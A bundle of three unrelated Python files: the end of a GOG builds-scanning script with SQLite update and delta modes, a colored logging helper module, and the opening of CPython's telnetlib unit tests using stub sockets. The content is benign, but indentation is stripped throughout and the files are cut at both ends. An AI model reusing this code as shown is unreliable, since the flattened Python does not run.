terminate_sync_counter = 0
logger.info('Waiting for all threads to complete...')
#sleep until all threads except the main thread finish processing
while threading.activeCount() > 1 and terminate_sync_counter <= THREAD_SYNC_TIMEOUT:
sleep(1)
terminate_sync_counter += 1
if terminate_sync_counter > THREAD_SYNC_TIMEOUT:
logger.warning('Thread sync on exit interval exceeded! Any stuck threads will now be terminated.')
elif scan_mode == 'update':
logger.info('--- Running in UPDATE scan mode ---')
update_scan_section = configParser['UPDATE_SCAN']
last_id = update_scan_section.getint('last_id')
ID_SAVE_FREQUENCY = update_scan_section.getint('id_save_frequency')
if last_id > 0:
logger.info(f'Restarting update scan from id: {last_id}.')
try:
logger.info('Starting builds update scan on all applicable DB entries...')
with sqlite3.connect(db_file_full_path) as db_connection:
#select all existing ids from the gog_builds table
db_cursor = db_connection.execute('SELECT DISTINCT gb_int_id FROM gog_builds WHERE gb_int_id > ? ORDER BY 1', (last_id, ))
id_list = db_cursor.fetchall()
logger.debug('Retrieved all applicable product ids from the DB...')
#used to track the number of processed ids
last_id_counter = 0
with requests.Session() as session:
for id_entry in id_list:
current_product_id = id_entry[0]
logger.debug(f'Now processing id {current_product_id}...')
complete_windows = False
complete_osx = False
retry_counter = 0
while not (complete_windows and complete_osx) and not terminate_signal:
if retry_counter > 0:
sleep_interval = (retry_counter ** RETRY_AMPLIFICATION_FACTOR) * RETRY_SLEEP_INTERVAL
logger.info(f'Sleeping for {sleep_interval} seconds due to throttling...')
sleep(sleep_interval)
complete_windows = gog_builds_query(current_product_id, 'windows', scan_mode, session, db_connection)
#try other oses as well, if the 'windows' scan goes well
if complete_windows:
complete_osx = gog_builds_query(current_product_id, 'osx', scan_mode, session, db_connection)
if complete_windows and complete_osx:
if retry_counter > 0:
                                logger.info(f'Successfully retried for {current_product_id}.')
last_id_counter += 1
else:
retry_counter += 1
#terminate the scan if the RETRY_COUNT limit is exceeded
if retry_counter > RETRY_COUNT:
logger.critical(f'Retry count exceeded, terminating scan!')
terminate_signal = True
#forcefully terminate script
terminate_script()
if not terminate_signal and last_id_counter != 0 and last_id_counter % ID_SAVE_FREQUENCY == 0:
configParser.read(conf_file_full_path)
configParser['UPDATE_SCAN']['last_id'] = str(current_product_id)
with open(conf_file_full_path, 'w') as file:
configParser.write(file)
logger.info(f'Saved scan up to last_id of {current_product_id}.')
logger.debug('Running PRAGMA optimize...')
db_connection.execute(OPTIMIZE_QUERY)
except KeyboardInterrupt:
terminate_signal = True
elif scan_mode == 'products':
logger.info('--- Running in PRODUCTS scan mode ---')
#blank the filter for a really thorough scan, although it usually doesn't make sense (but not always,
#since some "pack" and "dlc" entries do have builds linked to them... hopefully just GOGBears tripping)
#GAME_TYPE_FILTER = ''
#filtering by game_type will drastically reduce the number of scanned ids
GAME_TYPE_FILTER = ' AND gp_game_type = "game"'
try:
logger.info('Starting builds scan (based on products) on all applicable DB entries...')
with sqlite3.connect(db_file_full_path) as db_connection:
#select all existing ids from the gog_products table which are not already present in the
            #gog_builds table and attempt to scan them from matching builds API entries
db_cursor = db_connection.execute('SELECT gp_id FROM gog_products WHERE gp_id NOT IN '
f'(SELECT DISTINCT gb_int_id FROM gog_builds ORDER BY 1)'
f'{GAME_TYPE_FILTER} ORDER BY 1')
id_list = db_cursor.fetchall()
logger.debug('Retrieved all applicable product ids from the DB...')
with requests.Session() as session:
for id_entry in id_list:
current_product_id = id_entry[0]
logger.debug(f'Now processing id {current_product_id}...')
complete_windows = False
complete_osx = False
retry_counter = 0
while not (complete_windows and complete_osx) and not terminate_signal:
if retry_counter > 0:
sleep_interval = (retry_counter ** RETRY_AMPLIFICATION_FACTOR) * RETRY_SLEEP_INTERVAL
logger.info(f'Sleeping for {sleep_interval} seconds due to throttling...')
sleep(sleep_interval)
complete_windows = gog_builds_query(current_product_id, 'windows', scan_mode, session, db_connection)
#try other oses as well, if the 'windows' scan goes well
if complete_windows:
complete_osx = gog_builds_query(current_product_id, 'osx', scan_mode, session, db_connection)
if complete_windows and complete_osx:
if retry_counter > 0:
                                logger.info(f'Successfully retried for {current_product_id}.')
else:
retry_counter += 1
#terminate the scan if the RETRY_COUNT limit is exceeded
if retry_counter > RETRY_COUNT:
logger.critical(f'Retry count exceeded, terminating scan!')
terminate_signal = True
#forcefully terminate script
terminate_script()
logger.debug('Running PRAGMA optimize...')
db_connection.execute(OPTIMIZE_QUERY)
except KeyboardInterrupt:
terminate_signal = True
elif scan_mode == 'manual':
logger.info('--- Running in MANUAL scan mode ---')
manual_scan_section = configParser['MANUAL_SCAN']
#load the product id list to process
product_id_list = manual_scan_section.get('id_list')
product_id_list = [int(product_id.strip()) for product_id in product_id_list.split(',')]
try:
with requests.Session() as session:
with sqlite3.connect(db_file_full_path) as db_connection:
for product_id in product_id_list:
logger.info(f'Running scan for id {product_id}...')
complete_windows = False
complete_osx = False
retry_counter = 0
while not (complete_windows and complete_osx) and not terminate_signal:
if retry_counter > 0:
logger.warning(f'Reprocessing id {product_id}...')
#allow a short respite before re-processing
sleep(2)
complete_windows = gog_builds_query(product_id, 'windows', scan_mode, session, db_connection)
#try other oses as well, if the 'windows' scan goes well
if complete_windows:
complete_osx = gog_builds_query(product_id, 'osx', scan_mode, session, db_connection)
if complete_windows and complete_osx:
if retry_counter > 0:
                                logger.info(f'Successfully retried for {product_id}.')
else:
retry_counter += 1
#terminate the scan if the RETRY_COUNT limit is exceeded
if retry_counter > RETRY_COUNT:
logger.critical(f'Retry count exceeded, terminating scan!')
terminate_signal = True
#forcefully terminate script
terminate_script()
logger.debug('Running PRAGMA optimize...')
db_connection.execute(OPTIMIZE_QUERY)
except KeyboardInterrupt:
terminate_signal = True
elif scan_mode == 'delta':
logger.info('--- Running in DELTA scan mode ---')
#strip any punctuation or other grouping characters from builds/versions
STRIP_OUT_LIST = [' ', ',', '.', '-', '_', '[', ']', '(', ')', '{', '}', '/', '\\']
detected_discrepancies = {'windows': [], 'osx': []}
try:
with sqlite3.connect(db_file_full_path) as db_connection:
#select all existing ids from the gog_builds table (with valid builds) that are also present in the gog_products table
db_cursor = db_connection.execute('SELECT gb_int_id, gb_int_os, gb_int_title, gb_main_version_names FROM gog_builds WHERE gb_int_id IN '
'(SELECT gp_id FROM gog_products ORDER BY 1) AND gb_main_version_names IS NOT NULL ORDER BY 1')
delta_list = db_cursor.fetchall()
logger.debug('Retrieved all applicable product ids from the DB...')
for delta_entry in delta_list:
current_product_id = delta_entry[0]
current_os = delta_entry[1]
#'osx' compatible products have installer os field listings of 'mac', not 'osx'
current_os_files = 'mac' if current_os == 'osx' else current_os
logger.debug(f'Now processing id {current_product_id}, {current_os}...')
current_product_title = delta_entry[2]
current_main_version_names = delta_entry[3].split(MVF_VALUE_SEPARATOR)
logger.debug(f'Current builds main version names are: {current_main_version_names}.')
                #restricting languages to "en" only will solve a lot of version discrepancy problems, as some installers get misversioned non-English languages
#added at later points in time, however the following titles will no longer be tracked because of this (mentioning them here for future reference):
#
#Kajko i Kokosz 1720224179 pl
#Wolfenstein II: The New Colossus German Edition 1285433790 de
#Anstoss 2 Gold Edition 1808817480 de
#ANSTOSS 3: Der Fußballmanager 1886141726 de
#
db_cursor = db_connection.execute('SELECT DISTINCT gf_version FROM gog_files WHERE gf_int_id = ? AND gf_int_removed IS NULL AND gf_language = "en" '
'AND gf_int_download_type = "installer" AND gf_os = ? AND gf_version IS NOT NULL ORDER BY gf_int_added DESC LIMIT 1',
(current_product_id, current_os_files))
latest_version = db_cursor.fetchone()
if latest_version is not None:
current_latest_build_version_orig = current_main_version_names[0].strip()
logger.debug(f'Current latest main build version is: {current_latest_build_version_orig}.')
current_latest_file_version_orig = latest_version[0].strip()
logger.debug(f'Current latest file version is: {current_latest_file_version_orig}.')
excluded = False
#convert to uppercase for comparisons
current_latest_build_version = current_latest_build_version_orig.upper()
current_latest_file_version = current_latest_file_version_orig.upper()
#remove any (A) identifier from build versions
current_latest_build_version = current_latest_build_version.replace('(A)', '')
#remove any (A) identifier from file versions
current_latest_file_version = current_latest_file_version.replace('(A)', '')
#remove any 'GALAXY HOTFIX' and 'GOG HOTFIX' strings from build versions
current_latest_build_version = current_latest_build_version.replace('GALAXY HOTFIX', '')
current_latest_build_version = current_latest_build_version.replace('GOG HOTFIX', '')
#remove punctuation/formatting/grouping characters
for stripped_item in STRIP_OUT_LIST:
current_latest_build_version = current_latest_build_version.replace(stripped_item, '')
current_latest_file_version = current_latest_file_version.replace(stripped_item, '')
#strip any version/build set that starts with the letter 'V'
if current_latest_build_version.startswith('V') and current_latest_file_version.startswith('V'):
current_latest_build_version = current_latest_build_version[1:]
current_latest_file_version = current_latest_file_version[1:]
                    #strip any version/build set that ends with the letter 'A'
if current_latest_build_version.endswith('A') and current_latest_file_version.endswith('A'):
current_latest_build_version = current_latest_build_version[:-1]
current_latest_file_version = current_latest_file_version[:-1]
#remove (GOG-X) strings
current_latest_build_version = GOG_VERSION_REMOVAL_REGEX.sub('', current_latest_build_version)
logger.debug(f'Comparison build version is: {current_latest_build_version}.')
current_latest_file_version = GOG_VERSION_REMOVAL_REGEX.sub('', current_latest_file_version)
logger.debug(f'Comparison file version is: {current_latest_file_version}.')
#exclude any blank entries (blanked after previous filtering)
#as well as some weird corner-case matches due to GOG versioning madness
if current_latest_file_version == '' or current_latest_build_version == '':
excluded = True
elif current_latest_build_version[0] == 'V' and current_latest_build_version[1:] == current_latest_file_version:
excluded = True
elif current_latest_build_version[-1] == 'A' and current_latest_build_version[:-1] == current_latest_file_version:
excluded = True
elif current_latest_file_version[-1] == 'A' and current_latest_file_version[:-1] == current_latest_build_version:
excluded = True
if not excluded and current_latest_file_version != current_latest_build_version:
#add detected discrepancy to its os list
detected_discrepancies[current_os].append(current_product_id)
#use MAX on gid_int_false_positive, although there should only ever be one entry
db_cursor.execute('SELECT COUNT(*), MAX(gid_int_false_positive) FROM gog_installers_delta WHERE gid_int_id = ? '
'AND gid_int_os = ? AND gid_int_fixed IS NULL', (current_product_id, current_os))
installer_delta_entry_count, current_false_positive = db_cursor.fetchone()
#false positive status should be set to False for new entries
current_false_positive = False if current_false_positive is None else current_false_positive
if installer_delta_entry_count != 0:
db_cursor.execute('SELECT COUNT(*) FROM gog_installers_delta WHERE gid_int_id = ? AND gid_int_os = ? '
'AND gid_int_latest_galaxy_build = ? AND gid_int_latest_installer_version = ? AND gid_int_fixed IS NULL',
(current_product_id, current_os, current_latest_build_version_orig, current_latest_file_version_orig))
installer_version_delta_entry_count = db_cursor.fetchone()[0]
if installer_version_delta_entry_count != 0:
logger.debug(f'Discrepancy already logged for {current_product_id}: {current_product_title}, {current_os}. Skipping.')
else:
logger.debug(f'Found outdated discrepancy for {current_product_id}: {current_product_title}, {current_os}.')
if current_false_positive:
#any updates to a discrepancy should reset the false positive state of an entry
current_false_positive = False
logger.warning(f'False positive status has been reset for {current_product_id}, {current_os}.')
db_cursor.execute('UPDATE gog_installers_delta SET gid_int_latest_galaxy_build = ?, gid_int_latest_installer_version = ?, '
'gid_int_false_positive = ? WHERE gid_int_id = ? AND gid_int_os = ? AND gid_int_fixed IS NULL',
(current_latest_build_version_orig, current_latest_file_version_orig,
current_false_positive, current_product_id, current_os))
db_connection.commit()
logger.info(f'~~~ Successfully updated the entry for {current_product_id}: {current_product_title}, {current_os}.')
else:
logger.debug(f'Found new discrepancy for {current_product_id}: {current_product_title}, {current_os}.')
#gid_int_nr, gid_int_added, gid_int_fixed, gid_int_id, gid_int_title,
#gid_int_os, gid_int_latest_galaxy_build, gid_int_latest_installer_version
#gid_int_false_positive
db_cursor.execute(INSERT_INSTALLERS_DELTA_QUERY, (None, datetime.now(), None, current_product_id, current_product_title,
current_os, current_latest_build_version_orig, current_latest_file_version_orig,
current_false_positive))
db_connection.commit()
logger.info(f'+++ Successfully added an entry for {current_product_id}: {current_product_title}, {current_os}.')
else:
logger.debug(f'Product with id {current_product_id} is on the exclusion list. Skipping.')
            #verify if previously logged discrepancies have been fixed
db_cursor.execute('SELECT DISTINCT gid_int_id, gid_int_title, gid_int_os FROM gog_installers_delta WHERE gid_int_fixed IS NULL ORDER BY 1')
discrepancy_list = db_cursor.fetchall()
for discrepancy in discrepancy_list:
current_product_id = discrepancy[0]
current_product_title = discrepancy[1]
current_os = discrepancy[2]
if current_product_id not in detected_discrepancies[current_os]:
logger.debug(f'Discrepancy for {current_product_id}: {current_product_title}, {current_os} has been fixed.')
db_cursor.execute('UPDATE gog_installers_delta SET gid_int_fixed = ?, gid_int_false_positive = 0 WHERE gid_int_id = ? AND gid_int_os = ? '
'AND gid_int_fixed IS NULL', (datetime.now(), current_product_id, current_os))
db_connection.commit()
logger.info(f'--- Successfully updated fixed status for {current_product_id}: {current_product_title}, {current_os}.')
logger.debug('Running PRAGMA optimize...')
db_connection.execute(OPTIMIZE_QUERY)
except KeyboardInterrupt:
terminate_signal = True
if not terminate_signal and scan_mode == 'update':
logger.info('Resetting last_id parameter...')
configParser.read(conf_file_full_path)
configParser['UPDATE_SCAN']['last_id'] = '0'
with open(conf_file_full_path, 'w') as file:
configParser.write(file)
logger.info('All done! Exiting...')
##main thread end
|
__init__.py
|
# -*- coding: utf-8 -*-
import logging as _logging
import sys
__author__ = 'luckydonald'
__all__ = ["logging", "ColoredFormatter", "ColoredStreamHandler", "LevelByNameFilter"]
DEFAULT_DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
class ColoredFormatter(_logging.Formatter):
class Color(object):
"""
utility to return ansi colored text.
just to store the colors next to the function.
"""
# Color codes: http://misc.flogisoft.com/bash/tip_colors_and_formatting
def __init__(self, formatter):
self.formatter = formatter
# end def
colors = {
'default': 39,
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
'grey': 90,
'bgred': 41,
'bggrey': 100
}
mapping = {
'INFO': 'default',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'magenta',
'DEBUG': 'grey',
'SUCCESS': 'green'
}
color_prefix = '\033['
def prepare_color(self, color_number):
return ('%s%dm') % (self.color_prefix, color_number)
# end def
def colored(self, record):
"""
            Return the log record formatted as one or more ANSI colored lines,
            using the level-to-color mapping defined above.
"""
color = self.mapping.get(record.levelname, 'default')
clr = self.colors[color]
formatter = dict(
all_off=self.prepare_color(0), # Reset all attributes
color_on=self.prepare_color(clr), # Color as given/from lookup
color_off=self.prepare_color(39), # Default foreground color
inverse_on=self.prepare_color(7), # Reverse (invert the foreground and background colors)
inverse_off=self.prepare_color(27), # Reset reverse
background_off=self.prepare_color(49), # Default background color
file_color_on=self.prepare_color(94), # Light blue
)
lines = []
# log level
level = "{level:8}".format(level=record.levelname)
level_filler = "{:{}}".format("", len(level))
# file/function name
filepart = record.name if record.name else ""
filepart += "." + record.funcName if record.funcName != "<module>" else ""
# date
timestamp = " " + record.asctime if record.asctime else ""
timestamp_filler = " " * len(timestamp)
# Process / Thread names
process_thread_part = process_thread_part_filler = ""
has_process = hasattr(record, "processName") and record.processName != "MainProcess"
has_thread = hasattr(record, "threadName") and record.threadName != "MainThread"
if has_process:
process_thread_part += "{inverse_on}{file_color_on}{thread}{inverse_off}".format(
thread=record.processName, **formatter)
# end if
if has_process and has_thread:
process_thread_part += " ".format(**formatter)
# end if
if has_thread:
process_thread_part += "{inverse_on}{file_color_on}{process}{inverse_off}".format(
process=record.threadName, **formatter)
# end if
if has_process or has_thread and len(timestamp) > 1:
# inject the formatting here, as empty formatting without text would break
process_thread_part_filler = " " * len(process_thread_part)
process_thread_part = "{file_color_on}{inverse_on}{process_thread_part}{inverse_off}".format(
process_thread_part=process_thread_part, **formatter
)
# abuse {date} to contain a space for us. Because a blue colored space is still a space.
                timestamp += " " # so the file part doesn't immediately follow the date.
timestamp_filler += " "
# end if
# original message
lines_ = record.message.splitlines()
first_line = True if len(lines_) > 1 else None
for line in lines_:
if first_line is None: # single line
lines.append(
"{color_on}{inverse_on}{level}{inverse_off}{color_on}{date}{color_off}{file_color_on}{process_thread_part} {file_color_on}{filepart}:{color_off} {color_on}{message}{color_off}{background_off}{all_off}".format(
filepart=filepart, level=level, message=line, date=timestamp,
process_thread_part=process_thread_part, **formatter))
break
elif first_line: # first line
lines.append(
"{color_on}{inverse_on}{level}{inverse_off}{color_on}{date}{color_off}{file_color_on}{process_thread_part} {file_color_on}{filepart}:{color_off} {all_off}".format(
filepart=filepart, level=level, message=line, date=timestamp,
process_thread_part=process_thread_part, **formatter))
lines.append(
"{color_on}{inverse_on}{level_filler}{inverse_off}{color_off} {color_on}{message}{color_off}{background_off}{all_off}".format(
level_filler=level_filler, message=line, date=timestamp, date_filler=timestamp_filler,
process_thread_part=process_thread_part, process_thread_part_filler=process_thread_part_filler,
**formatter))
first_line = False
# end for
return "\n".join(lines)
# end def
def __init__(self, date_formatter=None):
super(ColoredFormatter, self).__init__(datefmt=date_formatter)
self.color_instance = self.Color(self)
def colored(self, record):
return self.color_instance.colored(record)
# end def
def format(self, record):
super(ColoredFormatter, self).format(record)
# if record.threadName == "MainThread":
# pass
# part1 = self.firstpart.format(record)
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
else:
record.asctime = ""
s = self._fmt % record.__dict__ # py3: s = self.formatMessage(record)
if record.exc_text:
if s[-1:] != "\n":
s += "\n"
try:
s = s + record.exc_text
except UnicodeError: # PYTHON 2, LOL!
# Sometimes filenames have non-ASCII chars, which can lead
# to errors when s is Unicode and record.exc_text is str
# See issue 8924.
# We also use replace for when there are multiple
# encodings, e.g. UTF-8 for the filesystem and latin-1
# for a script. See issue 13232.
s = s + record.exc_text.decode(sys.getfilesystemencoding(), 'replace')
if hasattr(record, "stack_info") and record.stack_info: # py2 doesn't have .stack_info
if s[-1:] != "\n":
s += "\n"
s = s + record.stack_info # py3: self.formatStack()
record.message = s
return self.colored(record)
# end def
def usesTime(self):
return bool(self.datefmt)
# end def
# end class
class ColoredStreamHandler(_logging.StreamHandler):
DEFAULT_DATE_FORMAT = DEFAULT_DATE_FORMAT
"""
Like the normal StreamHandler,
but it automatically sets
`self.formatter = ColoredFormatter()`
"""
def __init__(self, stream=None, date_formatter=DEFAULT_DATE_FORMAT):
super(ColoredStreamHandler, self).__init__(stream)
self.formatter = ColoredFormatter(date_formatter=date_formatter)
# noinspection PyProtectedMember,PyProtectedMember
class _LoggingWrapper(object):
SUCCESS = 25 # between WARNING and INFO
def __init__(self):
_logging.addLevelName(self.SUCCESS, 'SUCCESS')
def getLoglevelInt(self, level_string):
"""
You provide a String, and get a level int
:param level_string: The level.
:type level_string: str
:return: level
:rtype : int
        :raises KeyError: if the level does not exist.
"""
if isinstance(level_string, int):
return level_string
# end if
try:
return {
# as names:
"NOTSET": _logging.NOTSET,
"DEBUG": _logging.DEBUG,
"INFO": _logging.INFO,
"SUCCESS": self.SUCCESS,
"WARNING": _logging.WARNING,
"WARN": _logging.WARN, # = WARNING
"ERROR": _logging.ERROR,
"FATAL": _logging.FATAL, # = CRITICAL
"CRITICAL": _logging.CRITICAL,
}[level_string]
except KeyError:
try:
return int(level_string)
except ValueError:
pass
# end try
raise # key not known, and is no integer either.
# end try
# end def
def __call__(self, logger_name):
"""
alias to logger.getLogger(logger_name)
:param logger_name:
:return: self.getLogger(logger_name)
"""
return self.getLogger(logger_name)
# end def
def add_colored_handler(
self, logger_name=None, stream=None, level=None, date_formatter=DEFAULT_DATE_FORMAT, filter=None,
):
"""
        Register a logger handler that prints the messages in color.
        If stream is specified, the instance will use it for logging output; otherwise, sys.stdout will be used.
        If you supply a date_formatter, a date/time will also be printed for the logged messages.
        Uses python `time.strftime` time formatting, see https://docs.python.org/library/time.html#time.strftime
:keyword logger_name: the name of the logger you want to register the printing to.
Probably you should use __name__ , to use your package's logger,
"root" will force all loggers to output.
:type logger_name: str
:keyword stream: An output stream. Default: sys.stdout
:keyword date_formatter: Apply a format for time output. If `None` is given, no time gets printed.
Something like "%Y-%m-%d %H:%M:%S". Uses python `time.strftime` time formating,
see https://docs.python.org/library/time.html#time.strftime
:type date_formatter: str
:keyword filter: A filter applied to the handler.
:return: None
"""
logger = self.getLogger(logger_name) # __name__
if stream is None:
import sys
stream = sys.stdout
# end if
handler = ColoredStreamHandler(stream=stream, date_formatter=date_formatter)
if filter:
handler.addFilter(filter)
# end if
logger.addHandler(handler)
if level:
logger.setLevel(level)
# end if
return logger
# end def
def test_logger_levels(self, name=__name__, force_all_levels=True):
logger = self.getLogger(name)
logger_level = logger.getEffectiveLevel()
if force_all_levels:
logger.setLevel(logging.DEBUG)
logger.debug('level debug')
logger.info('level info')
logger.success('level success')
logger.warning('level warning')
logger.error('level error')
logger.critical('level critical')
if force_all_levels:
logger.setLevel(logger_level)
# end if
# end def
def getLogger(self, name=None):
"""
        Adds the .success() function to the logger; otherwise it is the same as logging.getLogger().
        :param name: the logger name, as accepted by logging.getLogger().
        :return: the logger with a .success() method attached
"""
logger = _logging.getLogger(name)
logger.SUCCESS = self.SUCCESS
setattr(logger, "success", lambda message, *args: logger._log(self.SUCCESS, message, args))
return logger
if sys.version < "3":
def success(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'SUCCESS'.
To pass exception information, use the keyword argument exc_info with
a true value.
logger.debug("Houston, we landed in the %s", "moon", exc_info=False)
"""
self._success(msg, *args, **kwargs)
else:
from .py3 import success
def _success(self, msg, *args, **kwargs):
if len(self.root.handlers) == 0:
self.basicConfig()
self.root._log(self.SUCCESS, msg, args, **kwargs)
def __getattr__(self, item):
if item != "__getattr__":
if item in self.__dict__:
return self.__dict__[item]
if item == "getLogger":
return self.getLogger
elif item == "success":
return self.success
elif item == "SUCCESS":
return self.SUCCESS
# end if
pass
else:
return getattr(_logging, item)
# end def
# end class
logging = _LoggingWrapper()
class LevelByNameFilter(object):
def __init__(self, root=logging.WARNING, debug=None, info=None, success=None, warning=None, error=None,
critical=None, by_level=None):
"""
A filter where you specify logging levels bound to names (package names, as known from importing)
        :param root: minimum level for the root logger and for any logger not matched by another entry. None to disable.
:param debug: all loggers which should log debug and above.
:param info: all loggers which should log info and above.
:param success: all loggers which should log success and above.
:param warning: all loggers which should log warning and above.
:param error: all loggers which should log error and above.
:param critical: all loggers which should log critical and above.
:param by_level: a dict with levels as a key, and names to log as value.
Example: {10: "__main__", 20: "a.b.c", 30: ["a.b.d", "a.b.e"], logging.WARNING: "a"}
"""
self.mapping = dict()
if root:
if isinstance(root, str):
root = logging.getLoglevelInt(root)
assert isinstance(root, int)
self.mapping[""] = root
# end
level = logging.DEBUG
self.parse_argument(debug, logging.DEBUG)
self.parse_argument(info, logging.INFO)
self.parse_argument(success, logging.SUCCESS)
self.parse_argument(warning, logging.WARNING)
self.parse_argument(error, logging.ERROR)
self.parse_argument(critical, logging.CRITICAL)
if by_level:
assert isinstance(by_level, dict)
for level, files in by_level.items():
self.parse_argument(files, level)
# end for
# end if
# end def
def parse_argument(self, argument, level):
if argument:
if isinstance(argument, tuple):
argument = list(argument)
if not isinstance(argument, list):
argument = [argument]
# end if
assert isinstance(argument, list)
for part in argument:
if isinstance(part, (list, tuple)):
argument.extend(part)
elif not isinstance(part, str):
raise TypeError("argument {val!r} is type {type}, should be str.".format(val=part, type=type(part)))
elif "," in part:
argument.append(part.split(","))
else:
self.mapping[part.strip() + "."] = level
# end if
# end for
# end if
# end def
def filter(self, record):
if not self.mapping:
            return False  # empty mapping: note that returning False from a logging filter drops the record
# end if
name = record.name + "."
mapping_path = "" # default is "" = root
for k in self.mapping:
if name.startswith(k):
if len(mapping_path) < len(k): # we got a longer path. longer = more specific.
mapping_path = k
# end if
# end if
# end for
if mapping_path in self.mapping: # e.g. root "" is not specified.
level = self.mapping[mapping_path]
return record.levelno >= level
# end if
return False
# end def
# end class
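# Illustrative sketch (not part of the original module): combining LevelByNameFilter with
# add_colored_handler; "some.package" is a placeholder for a real logger name.
#   name_filter = LevelByNameFilter(root=logging.WARNING, debug="__main__", info="some.package")
#   logging.add_colored_handler(logger_name="root", level=logging.DEBUG, filter=name_filter)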
# # Test code to get a threaded logger:
# from luckydonaldUtils.logger import logging;import threading; from time import sleep;
# def lel():
# logger.debug(threading.current_thread().name)
# logging.test_logger_levels(),logger.critical("littlepip is\nBEST\npony!")
# # end def
# logger = logging.add_colored_handler(level=logging.DEBUG, date_formatter="%Y-%m-%d %H:%M:%S");logging.add_colored_handler(level=logging.DEBUG); lel();sleep(1);thread=threading.Thread(target=lel);thread.start();thread.join()
|
test_telnetlib.py
|
import socket
import select
import telnetlib
import time
import contextlib
from unittest import TestCase
from test import support
threading = support.import_module('threading')
HOST = support.HOST
def server(evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.close()
except socket.timeout:
pass
finally:
serv.close()
class GeneralTests(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = support.bind_port(self.sock)
self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
def testBasic(self):
# connects
telnet = telnetlib.Telnet(HOST, self.port)
telnet.sock.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutNone(self):
# None, having other default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(telnet.sock.gettimeout() is None)
telnet.sock.close()
def testTimeoutValue(self):
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutOpen(self):
telnet = telnetlib.Telnet()
telnet.open(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
class SocketStub(object):
''' a socket proxy that re-defines sendall() '''
def __init__(self, reads=[]):
self.reads = reads
self.writes = []
self.block = False
def sendall(self, data):
self.writes.append(data)
def recv(self, size):
out = b''
while self.reads and len(out) < size:
out += self.reads.pop(0)
if len(out) > size:
self.reads.insert(0, out[size:])
out = out[:size]
return out
class TelnetAlike(telnetlib.Telnet):
def fileno(self):
raise NotImplementedError()
def close(self): pass
def sock_avail(self):
return (not self.sock.block)
def msg(self, msg, *args):
with support.captured_stdout() as out:
telnetlib.Telnet.msg(self, msg, *args)
self._messages += out.getvalue()
return
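# new_select below stands in for select.select during the tests: if the TelnetAlike object found
# in the argument lists has its stub socket's block flag set, nothing is reported as ready;
# otherwise the argument lists are returned unchanged, so no real file descriptors are ever polled.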
def new_select(*s_args):
block = False
for l in s_args:
for fob in l:
if isinstance(fob, TelnetAlike):
block = fob.sock.block
if block:
return [[], [], []]
else:
return s_args
@contextlib.contextmanager
def test_socket(reads):
def new_conn(*ignored):
return SocketStub(reads)
try:
old_conn = socket.create_connection
socket.create_connection = new_conn
yield None
finally:
socket.create_connection = old_conn
return
def test_telnet(reads=[], cls=TelnetAlike):
''' return a telnetlib.Telnet object that uses a SocketStub with
reads queued up to be read '''
for x in reads:
assert type(x) is bytes, x
with test_socket(reads):
telnet = cls('dummy', 0)
telnet._messages = '' # debuglevel output
return telnet
class ReadTests(TestCase):
def setUp(self):
self.old_select = select.select
select.select = new_select
def tearDown(self):
select.select = self.old_select
def test_read_until(self):
"""
read_until(expected, timeout=None)
        test the blocking version of read_until
"""
want = [b'xxxmatchyyy']
telnet = test_telnet(want)
data = telnet.read_until(b'match')
self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))
reads = [b'x' * 50, b'match', b'y' * 50]
expect = b''.join(reads[:-1])
telnet = test_telnet(reads)
data = telnet.read_until(b'match')
self.assertEqual(data, expect)
def test_read_all(self):
"""
read_all()
Read all data until EOF; may block.
"""
reads = [b'x' * 500, b'y' * 500, b'z' * 500]
expect = b''.join(reads)
telnet = test_telnet(reads)
data = telnet.read_all()
self.assertEqual(data, expect)
return
def test_read_some(self):
"""
read_some()
Read at least one byte or EOF; may block.
"""
# test 'at least one byte'
telnet = test_telnet([b'x' * 500])
data = telnet.read_some()
self.assertTrue(len(data) >= 1)
# test EOF
telnet = test_telnet()
data = telnet.read_some()
self.assertEqual(b'', data)
def _read_eager(self, func_name):
"""
read_*_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = b'x' * 100
telnet = test_telnet([want])
func = getattr(telnet, func_name)
telnet.sock.block = True
self.assertEqual(b'', func())
telnet.sock.block = False
data = b''
while True:
try:
data += func()
except EOFError:
break
self.assertEqual(data, want)
def test_read_eager(self):
        # read_eager and read_very_eager make the same guarantees
        # (they behave differently but we only test the guarantees)
self._read_eager('read_eager')
self._read_eager('read_very_eager')
# NB -- we need to test the IAC block which is mentioned in the
# docstring but not in the module docs
    def test_read_very_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_very_lazy())
while telnet.sock.reads:
telnet.fill_rawq()
data = telnet.read_very_lazy()
self.assertEqual(want, data)
self.assertRaises(EOFError, telnet.read_very_lazy)
def test_read_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_lazy())
data = b''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want.startswith(data))
self.assertEqual(data, want)
class nego_collector(object):
def __init__(self, sb_getter=None):
self.seen = b''
self.sb_getter = sb_getter
self.sb_seen = b''
